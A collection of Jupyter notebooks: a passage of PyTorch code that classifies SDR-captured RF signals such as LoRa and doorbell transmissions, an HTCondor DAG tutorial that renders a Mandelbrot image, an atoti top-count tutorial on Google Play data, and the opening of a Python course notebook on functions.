stft_plot = np.squeeze(inputs, axis=0) # fig=plt.figure(figsize=(8,8)) # ncols = 5 # nrows = 5 # range_plot = 1 # for x in range(1,22): # need to figure out how to not hard code this ********************* <----- # stft_mean, stft_std = histo_stats(stft_plot[x,:,:,:]) # if (x>=range_plot and x<(range_plot+25)): # stft_plot1 = 10*np.log10(np.abs(stft_plot[x, :, :, 0]+eps)) # stft_plot1 = np.squeeze(stft_plot1, 
axis=0) # fig.add_subplot(nrows, ncols, x-range_plot+1) # plt.imshow(stft_plot1, vmin=-70, vmax=5) # plt.show() #****************************************************************************************** freq_increment = (Fs*msps/2)/seg_freq.detach().cpu().numpy().item() print('freq_increment = ', freq_increment) print('TESTING inputs SHAPE = ', inputs.shape) target = Variable(target.cuda(GPU)) print('input in = ', inputs.shape) inputs = torch.squeeze(inputs, dim=0) print('input out = ', inputs.shape) inputs = inputs.permute(0,3,1,2).contiguous() print('counter convert stuff = ', counter, type(counter.numpy())) inputs = Variable(inputs.cuda(GPU)) print('permuted shape = ', inputs.shape) freq_count = 0 # keep track of array position freq_histo = np.zeros(counter.numpy()) for j in range(counter): inputs2 = inputs[j,:,:,:] inputs2 = torch.unsqueeze(inputs2,0) outputs = model(inputs2) _, predicted = torch.max(outputs.data, 1) #******************************* Print prediction range to match pics above *********** # if (j>=range_plot and j<(range_plot+25)): # print("j= ",j,' ',outputs.data.detach().cpu().numpy()) # print('prediction = ', predicted.detach().cpu().numpy()) #************************************************************************************* total = total +1 # Increment the total count match_freq = match_freq + freq_offset*freq_increment if (predicted.detach().cpu().numpy() == 0): c0 = c0 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 1): c1 = c1 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 2): c2 = c2 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 3): c3 = c3 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 4): c4 = c4 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 5): c5 = c5 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 6): c6 = c6 + 1 freq_histo[j] = 
match_freq/1000000 if (predicted.detach().cpu().numpy() == 7): c7 = c7 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 8): noise = noise + 1 if (predicted.detach().cpu().numpy() == 9): center_fft = center_fft + 1 if (predicted.detach().cpu().numpy() == 10): c8 = c8 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 11): c9 = c9 + 1 freq_histo[j] = match_freq/1000000 freq_offset = freq_offset + 1 if (freq_offset == seg_freq): freq_offset = 0 match_freq = start_frequency torch.cuda.empty_cache() # complete ****************************************************** freq_histo = np.ma.masked_equal(freq_histo, 0) histo_stats_freq_file(freq_histo,msps) denom = total-center_fft-noise print('************************* Probabilities ********************************') print('----------------------------WAVEFORMS-----------------------------------') if (denom == 0): print('Nothing but noise') else: print('LoRa 125 = {:.2f}%'.format(c0/denom*100)) print('GD55 DMR = {:.2f}%'.format(c1/denom*100)) print('NFM = {:.2f}%'.format(c2/denom*100)) print('TYT = {:.2f}'.format(c3/denom*100)) print('Vodeson Doorbell = {:.2f}%'.format(c4/denom*100)) print('clickndig = {:.2f}%'.format(c5/denom*100)) print('Sado doorbell = {:.2f}%'.format(c6/denom*100)) print('LoRa 250 = {:.2f}%'.format(c7/denom*100)) print('light switch = {:.2f}%'.format(c8/denom*100)) print('YSF = {:.2f}%'.format(c9/denom*100)) print('------------------------------------------------------------------------') print('***************************** noise and fft ****************************') print('noise matches = ', noise) print('center fft matches = ', center_fft) print('TOTAL patch count = ', total) print('***************************** Finished *********************************') # inference ************************************************************ def testing_live(msps): large_width = 400 np.set_printoptions(precision=2,floatmode='fixed', linewidth=large_width) 
model.eval() V = data.DataLoader(inference_dataloader_segmented(), batch_size=1) start_frequency = (center_freq_live) match_freq = start_frequency print('start_frequency = ', start_frequency/1000000) freq_offset = 0 total = noise = center_fft = target_to_int = accumulated_corrects = percent_correct = 0 c0 = c1 = c2 = c3 = c4 = c5 = c6 = c7 = c8 = c9 = 0 with torch.no_grad(): for i, rf_data in enumerate(V, 0): accumulated_corrects = 0 percent_correct = 0 target_to_int = 0 inputs, target, counter, seg_freq = rf_data print('testing counter = ', counter, 'seg_freq =', seg_freq) print('seg_freq = ', seg_freq) #**************************** Print segmented pics *********************************** stft_plot = np.squeeze(inputs, axis=0) fig=plt.figure(figsize=(8,8)) ncols = 5 nrows = 5 range_plot = 1 range_end = range_plot+5 for x in range(1,51): # need to figure out how to not hard code this ********************* <----- if (x>=range_plot and x<(range_end)): stft_plot1 = stft_plot[x, :, :, 1] stft_plot1 = 10*np.log10(np.abs(stft_plot[x, :, :, 0]+eps)) fig.add_subplot(nrows, ncols, x-range_plot+1) plt.imshow(stft_plot1, vmin=-70, vmax=5) plt.show() #****************************************************************************************** freq_increment = (Fs*msps/2)/seg_freq.detach().cpu().numpy().item() print('freq_increment = ', freq_increment) print('TESTING inputs SHAPE = ', inputs.shape) target = Variable(target.cuda(GPU)) print('input in = ', inputs.shape) inputs = torch.squeeze(inputs, dim=0) print('input out = ', inputs.shape) inputs = inputs.permute(0,3,1,2).contiguous() print('counter convert stuff = ', counter, type(counter.numpy())) inputs = Variable(inputs.cuda(GPU)) print('permuted shape = ', inputs.shape) freq_count = 0 # keep track of array position freq_histo = np.zeros(counter.numpy()) for j in range(counter): inputs2 = inputs[j,:,:,:] inputs2 = torch.unsqueeze(inputs2,0) outputs = model(inputs2) _, predicted = torch.max(outputs.data, 1) 
#******************************* Print prediction range to match pics above *********** # if (j>=range_plot and j<(range_end)): # # print("j= ",j,' ',outputs.data.detach().cpu().numpy()) # print('prediction = ', predicted.detach().cpu().numpy()) # print('******************') #************************************************************************************* total = total +1 # Increment the total count match_freq = match_freq + freq_offset*freq_increment if (predicted.detach().cpu().numpy() == 0): c0 = c0 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 1): c1 = c1 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 2): c2 = c2 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 3): c3 = c3 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 4): c4 = c4 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 5): c5 = c5 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 6): c6 = c6 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 7): c7 = c7 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 8): noise = noise + 1 if (predicted.detach().cpu().numpy() == 9): center_fft = center_fft + 1 if (predicted.detach().cpu().numpy() == 10): c8 = c8 + 1 freq_histo[j] = match_freq/1000000 if (predicted.detach().cpu().numpy() == 11): c9 = c9 + 1 freq_histo[j] = match_freq/1000000 freq_offset = freq_offset + 1 if (freq_offset == seg_freq): freq_offset = 0 match_freq = start_frequency torch.cuda.empty_cache() # complete ****************************************************** freq_histo = np.ma.masked_equal(freq_histo, 0) histo_stats_freq_live(freq_histo,msps) denom = total-center_fft-noise print('************************* Probabilities ********************************') print('----------------------------WAVEFORMS-----------------------------------') if (denom == 
0): print('Nothing but noise') else: print('LoRa 125 = {:.2f}%'.format(c0/denom*100)) print('GD55 DMR = {:.2f}%'.format(c1/denom*100)) print('NFM = {:.2f}%'.format(c2/denom*100)) print('TYT = {:.2f}'.format(c3/denom*100)) print('Vodeson Doorbell = {:.2f}%'.format(c4/denom*100)) print('clickndig = {:.2f}%'.format(c5/denom*100)) print('Sado doorbell = {:.2f}%'.format(c6/denom*100)) print('LoRa 250 = {:.2f}%'.format(c7/denom*100)) print('light switch = {:.2f}%'.format(c8/denom*100)) print('YSF = {:.2f}%'.format(c9/denom*100)) print('------------------------------------------------------------------------') print('***************************** noise and fft ****************************') print('noise matches = ', noise) print('center fft matches = ', center_fft) print('TOTAL patch count = ', total) print('***************************** Finished *********************************') train_dataloader = RFDataset(path) training_data = data.DataLoader(train_dataloader, batch_size=batches, shuffle=True) ``` ## CUDA initialization ``` model = VGG_net() CUDA = torch.cuda.is_available() if CUDA: model.cuda(GPU) CUDA torch.cuda.empty_cache() ``` ## Final training initialization ``` # momentum = .3 criterion = nn.CrossEntropyLoss() lr= 1e-5 optimizer = optim.AdamW(model.parameters(), lr=lr) # optimizer = optim.SGD(model.parameters(), lr=lr,momentum=momentum) # optimizer = optim.RMSprop(model.parameters(), lr=lr,momentum=momentum) # optimizer = optim.SGD(model.parameters(), lr=lr) # training_data = data.DataLoader(rf_dataset, batch_size=batches, shuffle=True) model.train() # VALIDATION ************************************************************ np.set_printoptions(threshold=np.inf) calc = np.zeros([6]) averaging = 0 correct = 0 total = 0 V = data.DataLoader(inference_dataloader_segmented(), batch_size=1, shuffle=True) model.eval() ``` ### TRAIN Model ``` total = 100 loss_plot,total_plot = train_net(total) path_plot_fig = "/home/david/sigMF_ML/RF/RF_class/plot_data/" # ACE 
os.chdir(path_plot_fig) # # num = 20 np.save('vgg16_2D_plot_1e5', np.asarray(total_plot)) # np.save('vgg16_2D_plot_10dB_2_20210227', total_plot) path_plot_fig = "/home/david/sigMF_ML/RF/RF_class/plot_data/" # ACE os.chdir(path_plot_fig) resnet50_2D = np.load('resnet50_2D_20210227_1e4lr_10dB.npy') resnet50_4D = np.load('resnet50_4D_1e4lr_20210227.npy') resnet18_4D = np.load('resnet18_4D_1e4lr_20210227.npy') resnet18_2D = np.load('resnet18_2D_20210227_10dB_1e4lr.npy') vgg16_4D = np.load('VGG16_4D_plot_20210226.npy') vgg16_2D = np.load('vgg16_2D_plot_10dB_20210227.npy') # path_plot_fig = "/home/david/sigMF_ML/RF/RF_class/plot_data/" # ACE # os.chdir(path_plot_fig) # np.save('vgg16_4D_plot_10dB_longarray', np.asarray(vgg16_4D_956)) np.amax(vgg16_2D) vgg16_2D.shape np.amax(resnet50_4D) resnet50_4D.shape np.amax(resnet50_2D) resnet50_2D.shape np.amax(resnet18_4D) resnet18_4D.shape np.amax(resnet18_2D) resnet18_2D.shape # num = len(resnet50_4D) # reduced rank by 1 for matrix math to work out ymin = 80 ymax = 100 num = 100 x = np.arange(0,num,1) # Start at index position 1 plt.figure(figsize=(9, 6)) fig2 = plt.figure() # plt.plot(x[1:num],resnet18_4D[1:num], c='#1f77b4',markersize=1, linewidth=.5,markerfacecolor='#1f77b4',markeredgecolor='#1f77b4',markeredgewidth=1,label='ResNet18 4D') # plt.plot(x[1:num],resnet18_2D[1:num], c='#ff7f0e',markersize=1, linewidth=.5,markerfacecolor='#ff7f0e',markeredgecolor='#ff7f0e',markeredgewidth=1, label='ResNet18 2D') # plt.plot(x[1:num],vgg16_4D[1:num], c='#2ca02c', markersize=1, linewidth=.5,markerfacecolor='#2ca02c',markeredgecolor='#2ca02c',markeredgewidth=1, label='VGG16 4D') plt.plot(x[1:num],resnet50_2D[1:num], c='#d62728', markersize=1, linewidth=.5,markerfacecolor='#d62728',markeredgecolor='#d62728',markeredgewidth=1, label='ResNet50 2D') # plt.plot(x[1:num],resnet50_4D[1:num], c='#9467bd', markersize=1, linewidth=.5,markerfacecolor='#9467bd',markeredgecolor='#9467bd',markeredgewidth=1, label='ResNet50 4D') # 
plt.plot(x[1:num],vgg16_2D[1:num], c='#8c564b', markersize=1, linewidth=.5,markerfacecolor='#8c564b',markeredgecolor='#8c564b',markeredgewidth=2, label='VGG16 2D') plt.legend(loc='lower right') axes = plt.gca() # Get the Current Axis, create one, if necessary xmin = 0 xmax = 100 axes.set_xlim([xmin,xmax]) axes.set_ylim([ymin,ymax]) # '-o' '-X' '-P' '-D' '-^' '-*' plt.title('Validation accuracy resnet50_2ch') plt.xlabel('Iteration/100') plt.ylabel('% accuracy') plt.grid() # plt.minorticks_on() # plt.yticks(np.arange(70,80,90,100.01)) plt.xticks([0, 25, 50, 75, 100]) fig2.savefig('resnet50_2ch.pdf', format="pdf") plt.show() os.chdir(path_fig) plt.figure(figsize=(9, 6)) fig = plt.figure() plt.plot(loss_plot,c='r', label='Loss curve') plt.legend(loc='upper right') plt.title('Loss vs Epochs') plt.xlabel('Epochs') plt.ylabel('Loss') plt.grid() fig.savefig('RF_class_v50_loss_4D.pdf', format="pdf") plt.show() ``` ### LIVE inferencing ``` # !python3 /home/david/sigMF_ML/gnuradio/record_live.py ``` #### 2D tensor with 300 noise vodeson - 10 lora250 - 0 lora125 - click - 10 sado - 4ish light - tyt - GD55 nfm - ### TESTING ``` msps = 25 center_freq_live = 428.0e6 # when SDR doing 25MSPS with center at 428MHz, or 433.65e6, 428.00e6 !python3 /home/david/sigMF_ML/gnuradio/record_live_25msps.py # !python3 /home/david/sigMF_ML/gnuradio/record_live1msps.py # usrp_data_collect_1MSPS() data_IQ_list_val, meta_list_val = inference_read(msps) testing_live(msps) torch.cuda.empty_cache() msps = 5 center_freq_live = 433.0e6 # when SDR doing 25MSPS with center at 428MHz, or 433.65e6, 428.00e6 !python3 /home/david/sigMF_ML/gnuradio/record_live_5msps.py # !python3 /home/david/sigMF_ML/gnuradio/record_live1msps.py # usrp_data_collect_1MSPS() data_IQ_list_val, meta_list_val = inference_read(msps) testing_live(msps) torch.cuda.empty_cache() msps = 1 center_freq_live = 433.65e6 # when SDR doing 25MSPS with center at 428MHz, or 433.65e6, 428.00e6 # !python3 
/home/david/sigMF_ML/gnuradio/record_live25msps.py !python3 /home/david/sigMF_ML/gnuradio/record_live_1msps.py # usrp_data_collect_1MSPS() data_IQ_list_val, meta_list_val = inference_read(msps) testing_live(msps) torch.cuda.empty_cache() torch.cuda.empty_cache() ``` ## testing pre-recorded files in /home/david/sigMF_ML/RF/RF_class/testing_data ``` msps = 25 center_freq_file = 428.00e6 # when SDR doing 25MSPS with center at 428MHz, or 433.65e6, 428.00e6 data_IQ_list_val, meta_list_val = inference_read_file(msps, path_test_25msps) testing_file(msps) torch.cuda.empty_cache() msps = 5 center_freq_file = 433.00e6 # when SDR doing 25MSPS with center at 428MHz, or 433.65e6, 428.00e6 data_IQ_list_val, meta_list_val = inference_read_file(msps, path_test_5msps) testing_file(msps) torch.cuda.empty_cache() msps = 1 center_freq_file = 433.65e6 # when SDR doing 25MSPS with center at 428MHz, or 433.65e6, 428.00e6 data_IQ_list_val, meta_list_val = inference_read_file(msps, path_test_1msps) testing_file(msps) torch.cuda.empty_cache() torch.cuda.empty_cache() ``` #### Save and Load model data ``` rf_model = 'ResNet50_v56_2D_20210208_100noise' PATH = path_save+rf_model ``` #### save ``` # torch.save(model.state_dict(), PATH) ``` #### load ``` # device = torch.device("cuda:0") # model = resnet50(2, 12) # model.load_state_dict(torch.load(PATH)) # model.to(device) # model.eval() # # Print model's state_dict # print("Model's state_dict:") # for param_tensor in model.state_dict(): # print(param_tensor, "\t", model.state_dict()[param_tensor].size()) # # Print optimizer's state_dict # print("Optimizer's state_dict:") # for var_name in optimizer.state_dict(): # print(var_name, "\t", optimizer.state_dict()[var_name]) # # SAVE MODEL # os.chdir(path_save) # torch.save({ # 'epoch': epoch, # 'model_state_dict': model.state_dict(), # 'optimizer_state_dict': optimizer.state_dict(), # 'loss': loss, # }, path_save+rf_model) # # LOAD MODEL # checkpoint = torch.load(path_save+rf_model, 
map_location=device) # # STATUS # checkpoint.keys() # epoch = checkpoint['epoch'] # model_state_dict = checkpoint['model_state_dict'] # optimizer_state_dict = checkpoint['optimizer_state_dict'] # loss = checkpoint['loss'] # optimizer_state_dict.keys() # optimizer_state_dict['param_groups'] # loss # model.load_state_dict(model_state_dict) # loss # optimizer_state_dict.keys() ```
github_jupyter
# DAG Creation and Submission Launch this tutorial in a Jupyter Notebook on Binder: [![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/htcondor/htcondor-python-bindings-tutorials/master?urlpath=lab/tree/DAG-Creation-And-Submission.ipynb) In this tutorial, we will learn how to use `htcondor.dags` to create and submit an HTCondor DAGMan workflow. Our goal will be to create an image of the Mandelbrot set. This is a perfect problem for high-throughput computing because each point in the image can be calculated completely independently of any other point, so we are free to divide the image creation up into patches, each created by a single HTCondor job. DAGMan will enter the picture to coordinate stitching the image patches we create back into a single image. ## Making a Mandelbrot set image locally We'll use `goatbrot` (https://github.com/beejjorgensen/goatbrot) to make the image. `goatbrot` can be run from the command line, and takes a series of options to specify which part of the Mandelbrot set to draw, as well as the properties of the image itself. `goatbrot` options: - `-i 1000` The number of iterations. - `-c 0,0` The center point of the image region. - `-w 3` The width of the image region. - `-s 1000,1000` The pixel dimensions of the image. - `-o test.ppm` The name of the output file to generate. We can run a shell command from Jupyter by prefixing it with a `!`: ``` ! ./goatbrot -i 10 -c 0,0 -w 3 -s 500,500 -o test.ppm ! convert test.ppm test.png ``` Let's take a look at the test image. It won't be very good, because we didn't run for very many iterations. We'll use HTCondor to produce a better image! ``` from IPython.display import Image Image('test.png') ``` ## What is the workflow? We can parallelize this calculation by drawing rectangular sub-regions of the full region ("tiles") we want and stitching them together into a single image using `montage`. 
Let's draw this out as a graph, showing how data (image patches) will flow through the system.
(Don't worry about this code, unless you want to know how to make dot diagrams in Python!)

```
from graphviz import Digraph
import itertools

num_tiles_per_side = 2

dot = Digraph()

dot.node('montage')

for x, y in itertools.product(range(num_tiles_per_side), repeat = 2):
    n = f'tile_{x}-{y}'
    dot.node(n)
    dot.edge(n, 'montage')

dot
```

Since we can chop the image up however we'd like, we have as many tiles per side as we'd like (try changing `num_tiles_per_side` above). The "shape" of the DAG is the same: there is a "layer" of `goatbrot` jobs that calculate tiles, which all feed into `montage`.

Now that we know the structure of the problem, we can start describing it to HTCondor.

## Describing `goatbrot` as an HTCondor job

We describe a job using a `Submit` object. It corresponds to the submit *file* used by the command line tools. It mostly behaves like a standard Python dictionary, where the keys and values correspond to submit descriptors.

```
import htcondor

tile_description = htcondor.Submit(
    executable = 'goatbrot',  # the program we want to run
    arguments = '-i 10000 -c $(x),$(y) -w $(w) -s 500,500 -o tile_$(tile_x)-$(tile_y).ppm',  # the arguments to pass to the executable
    log = 'mandelbrot.log',  # the HTCondor job event log
    output = 'goatbrot.out.$(tile_x)_$(tile_y)',  # stdout from the job goes here
    error = 'goatbrot.err.$(tile_x)_$(tile_y)',  # stderr from the job goes here
    request_cpus = '1',  # resource requests; we don't need much per job for this problem
    request_memory = '128MB',
    request_disk = '1GB',
)

print(tile_description)
```

Notice the heavy use of macros like `$(x)` to specify the tile. Those aren't built-in submit macros; instead, we will plan on passing their values in through **vars**. Vars will let us customize each individual job in the tile layer by filling in those macros individually.
Each job will receive a dictionary of macro values; our next goal is to make a list of those dictionaries.

We will do this using a function that takes the number of tiles per side as an argument. As mentioned above, the **structure** of the DAG is the same no matter how "wide" the tile layer is. This is why we define a function to produce the tile vars instead of just calculating them once: we can vary the width of the DAG by passing different arguments to `make_tile_vars`. More customizations could be applied to make different images (for example, you could make it possible to set the center point of the image).

```
def make_tile_vars(num_tiles_per_side, width = 3):
    width_per_tile = width / num_tiles_per_side

    # center coordinate of each tile, offset so the tiles together cover the full region
    centers = [
        width_per_tile * (n + 0.5 - (num_tiles_per_side / 2))
        for n in range(num_tiles_per_side)
    ]

    vars = []
    for (tile_y, y), (tile_x, x) in itertools.product(enumerate(centers), repeat = 2):
        var = dict(
            w = width_per_tile,
            x = x,
            y = -y,  # image coordinates vs. Cartesian coordinates
            tile_x = str(tile_x).rjust(5, '0'),
            tile_y = str(tile_y).rjust(5, '0'),
        )
        vars.append(var)

    return vars

tile_vars = make_tile_vars(2)
for var in tile_vars:
    print(var)
```

If we want to increase the number of tiles per side, we just pass in a larger number. Because the `tile_description` is **parameterized** in terms of these variables, it will work the same way no matter what we pass in as `vars`.

```
tile_vars = make_tile_vars(4)
for var in tile_vars:
    print(var)
```

## Describing montage as an HTCondor job

Now we can write the `montage` job description. The problem is that the arguments and input files depend on how many tiles we have, which we don't know ahead-of-time. We'll take the brute-force approach of just writing a function that takes the tile `vars` we made in the previous section and using them to build the `montage` job description.

Note that some of the work of building up the submit description is done in Python.
This is a major advantage of communicating with HTCondor via Python: you can do the hard work in Python instead of in submit language!

One area for possible improvement here is to remove the duplication of the format of the input file names, which is repeated here from when it was first used in the `goatbrot` submit object. When building a larger, more complicated workflow, it is important to reduce duplication of information to make it easier to modify the workflow in the future.

```
def make_montage_description(tile_vars):
    num_tiles_per_side = int(len(tile_vars) ** .5)

    input_files = [f'tile_{d["tile_x"]}-{d["tile_y"]}.ppm' for d in tile_vars]

    return htcondor.Submit(
        executable = '/usr/bin/montage',
        arguments = f'{" ".join(input_files)} -mode Concatenate -tile {num_tiles_per_side}x{num_tiles_per_side} mandelbrot.png',
        transfer_input_files = ', '.join(input_files),
        log = 'mandelbrot.log',
        output = 'montage.out',
        error = 'montage.err',
        request_cpus = '1',
        request_memory = '128MB',
        request_disk = '1GB',
    )

montage_description = make_montage_description(make_tile_vars(2))

print(montage_description)
```

## Describing the DAG using `htcondor.dags`

Now that we have the job descriptions, all we have to do is use `htcondor.dags` to tell DAGMan about the dependencies between them. `htcondor.dags` is a subpackage of the HTCondor Python bindings that lets you write DAG descriptions using a higher-level language than raw DAG description file syntax. Incidentally, it also lets you use Python to drive the creation process, increasing your flexibility.

**Important Concept:** the code from `dag = dags.DAG()` onwards only defines the **topology** (or **structure**) of the DAG. The `tile` layer can be flexibly grown or shrunk by adjusting the `tile_vars` without changing the topology, and this can be clearly expressed in the code. The `tile_vars` are driving the creation of the DAG.

Try changing `num_tiles_per_side` to some other value!
```
from htcondor import dags

num_tiles_per_side = 2

# create the tile vars early, since we need to pass them to multiple places later
tile_vars = make_tile_vars(num_tiles_per_side)

dag = dags.DAG()

# create the tile layer, passing in the submit description for a tile job and the tile vars
tile_layer = dag.layer(
    name = 'tile',
    submit_description = tile_description,
    vars = tile_vars,
)

# create the montage "layer" (it only has one job in it, so no need for vars)
# note that the submit description is created "on the fly"!
montage_layer = tile_layer.child_layer(
    name = 'montage',
    submit_description = make_montage_description(tile_vars),
)
```

We can get a textual description of the DAG structure by calling the `describe` method:

```
print(dag.describe())
```

## Write the DAG to disk

We still need to write the DAG to disk to get DAGMan to work with it. We also need to move some files around so that the jobs know where to find them.

```
from pathlib import Path
import shutil

dag_dir = (Path.cwd() / 'mandelbrot-dag').absolute()

# blow away any old files
shutil.rmtree(dag_dir, ignore_errors = True)

# make the magic happen!
dag_file = dags.write_dag(dag, dag_dir)

# the submit files are expecting goatbrot to be next to them, so copy it into the dag directory
shutil.copy2('goatbrot', dag_dir)

print(f'DAG directory: {dag_dir}')
print(f'DAG description file: {dag_file}')
```

## Submit the DAG via the Python bindings

Now that we have written out the DAG description file, we can submit it for execution using the standard Python bindings submit mechanism.
The `Submit` class has a static method which can read a DAG description and generate a corresponding `Submit` object:

```
dag_submit = htcondor.Submit.from_dag(str(dag_file), {'force': 1})

print(dag_submit)
```

Now we can enter the DAG directory and submit the DAGMan job, which will execute the graph:

```
import os

os.chdir(dag_dir)

schedd = htcondor.Schedd()
with schedd.transaction() as txn:
    cluster_id = dag_submit.queue(txn)

print(f"DAGMan job cluster is {cluster_id}")

os.chdir('..')
```

Let's wait for the DAGMan job to complete by reading its event log:

```
dag_job_log = f"{dag_file}.dagman.log"
print(f"DAG job log file is {dag_job_log}")

# read events from the log, waiting forever for the next event
dagman_job_events = htcondor.JobEventLog(str(dag_job_log)).events(None)

# this event stream only contains the events for the DAGMan job itself, not the jobs it submits
for event in dagman_job_events:
    print(event)

    # stop waiting when we see the terminate event
    if event.type is htcondor.JobEventType.JOB_TERMINATED and event.cluster == cluster_id:
        break
```

Let's look at the final image!

```
Image(dag_dir / "mandelbrot.png")
```
github_jupyter
# Ways to visualize top count with atoti Given different categories of items, we will explore how to achieve the following with atoti: - Visualize top 10 apps with the highest rating in table - Visualize top 10 categories with most number of apps rated 5 in Pie chart - Visualize top 10 apps for each category in subplots See [pandas.ipynb](pandas.ipynb) to see how we can achieve the similar top count with Pandas. __Note on data:__ We are using the [Google Play Store Apps data](https://www.kaggle.com/lava18/google-play-store-apps) from Kaggle. Data has been processed to convert strings with millions and thousands abbreviations into numeric data. <div style="text-align:center"><a href="https://www.atoti.io/?utm_source=gallery&utm_content=top-count" target="_blank" rel="noopener noreferrer"><img src="https://data.atoti.io/notebooks/banners/discover.png" alt="atoti table" /></a></div> ## Top count with atoti ``` import atoti as tt session = tt.create_session(config={"user_content_storage": "./content"}) playstore = session.read_csv( "s3://data.atoti.io/notebooks/topcount/googleplaystore_cleaned.csv", table_name="playstore", keys=["App", "Category", "Genres", "Current Ver"], types={"Reviews": tt.type.FLOAT, "Installs": tt.type.FLOAT}, process_quotes=True, ) playstore.head() cube = session.create_cube(playstore, "Google Playstore") cube.schema ``` ### Top 10 apps with highest rating across categories Use the content editor to apply a top count filter on the pivot table. ``` session.visualize("Top 10 apps with highest rating across categories") ``` ### Top 10 categories with the most number of apps rated 5 ``` h, l, m = cube.hierarchies, cube.levels, cube.measures m ``` #### Number of apps rated 5 Create a measure that counts the number of apps rated 5 within categories and at levels below the category. 
```
m["Count with rating 5"] = tt.agg.sum(
    tt.where(m["Rating.MEAN"] == 5, m["contributors.COUNT"], 0),
    scope=tt.scope.origin(l["Category"], l["App"]),
)
```

We can drill down to different levels from category and the count is computed on the fly.

```
session.visualize("Categories with apps rated 5")
```

Apply top count filter from **atoti editor** on the category by the `Count with rating 5` measure. The atoti editor is atoti's Jupyterlab extension on the right with the <img src="https://data.atoti.io/notebooks/topcount/atoti_editor.png" alt="a." width="50"> icon.

```
session.visualize("Top 10 categories with most number of apps rated 5")
```

### Top 10 apps for each category

Since we are performing top 10 apps filtering for each category, it's only right that we classify `App` under `Category`. In this case, we create a multi-level hierarchy such as the following:

```
h["App Categories"] = [l["Category"], l["App"]]
h
```

This structure allows us to select at which level we want to apply the top count on in a multilevel hierarchy from the atoti editor.

<img src="https://data.atoti.io/notebooks/topcount/filter_by_category.png" alt="Filter by level" width="30%">

```
session.visualize("Top 10 apps with highest rating for each category")
```

#### Creating subplot to visualize top count per category

Again, go to atoti's Jupyterlab extension and add `Category` level to the subplot section.

<img src="https://data.atoti.io/notebooks/topcount/subplot_controls.png" alt="create subplot" width="30%">

Slice the pie chart by `Apps` and apply filter on `App` level of the `App Categories`

```
session.visualize("Top 10 apps within each categories")
```

You can use the filter to select the categories that you want to view. Alternatively, use `session.url` to access the web application to build an interactive dashboard with quick filters. Check out the link below.
``` session.link(path="/#/dashboard/767") ``` <div style="text-align:center"><a href="https://www.atoti.io/?utm_source=gallery&utm_content=top-count" target="_blank" rel="noopener noreferrer"><img src="https://data.atoti.io/notebooks/banners/discover-try.png" alt="atoti table" /></a></div>
github_jupyter
## Reading/writing files ### BIOINF 575 - Fall 2020 ### Functions recap - important functions continued #### RECAP & RESOURCES #### RECAP ```python # FUNCTIONS # DEFINITION - creating a function def function_name(arg1, arg2, darg=None): # instructions to compute result return result # CALL - running a function function_result = function_name(val1, val2, dval) ``` * <b>A function doesn't need to have arguments to work</b> * <b>`return` statments exit the function while passing on the data</b> * <b>if there is no `return` statement None is returned</b> * <b>Defining a function does not run a function. </b> * <b>To run a function, it must be called using `([args])` after the function name</b> ```python function_name(val1, val2, [dval]) ``` #### RESOURCES FUNCTIONS https://docs.python.org/3/tutorial/introduction.html https://docs.python.org/3/library/functions.html https://www.python.org/dev/peps/pep-0257/ https://www.tutorialspoint.com/python3/python_functions.htm https://www.geeksforgeeks.org/functions-in-python/ https://github.com/Pierian-Data/Complete-Python-3-Bootcamp/tree/master/03-Methods%20and%20Functions READING & WRITING FILES https://docs.python.org/3/tutorial/inputoutput.html#reading-and-writing-files https://www.tutorialspoint.com/python/python_files_io.htm https://www.geeksforgeeks.org/reading-writing-text-files-python/ https://www.w3schools.com/python/python_file_write.asp https://www.python-course.eu/python3_file_management.php https://colab.research.google.com/github/computationalcore/introduction-to-python/blob/master/notebooks/4-files/PY0101EN-4-1-ReadFile.ipynb https://github.com/aushafy/Python-Write-and-Read-File https://eeob-biodata.github.io/BCB546X-Fall2017/Week_09/additional-lesson/ --- ### Function Examples ___ ##### <b>`*args`</b> - unkown no. of arguments - unpack collection of argument values ##### <b>`**kargs`</b> - unkown no. 
of arguments - unpack mapping of names and values ``` x = 20 print(*("EGFR", "TP53", "AAACGTTA", 30, [x, 60])) print("EGFR", "TP53", "AAACGTTA", 30, [x, 60]) def test_karg(**keys_args_dict): for name,value in keys_args_dict.items(): print("name = ", name) print("value = ", value) test_karg(**{"gene":"EGFR", "expression": 20,"transcript_no": 4}) test_karg(gene = "EGFR", expression = 20, transcript_no = 4) ``` ___ ##### <b>`Recursive`</b> function - function that calls itself ``` test_list = ["CGTA", "CCCT", "GGGA", "ACGG"] def display_elements(seq_list, pos): if pos <= len(seq_list)-1: print(seq_list[pos]) display_elements(seq_list, pos + 1) display_elements(test_list, 0) ``` ____ ##### <b>`lambda` function</b> - anonymous function - it has no name Should be used only with simple expressions https://docs.python.org/3/reference/expressions.html#lambda<br> https://www.geeksforgeeks.org/python-lambda-anonymous-functions-filter-map-reduce/<br> https://realpython.com/python-lambda/<br> `lambda arguments : expression` A lambda function can take <b>any number of arguments<b>, but must always have <b>only one expression</b>. ``` compute_expression = lambda x, y: x + y + x*y compute_expression(2, 3) ``` ____ ### Useful functions #### Built-in functions https://docs.python.org/3/library/functions.html ##### <b>`zip(*iterables)`</b> - make an iterator that aggregates respective elements from each of the iterables. 
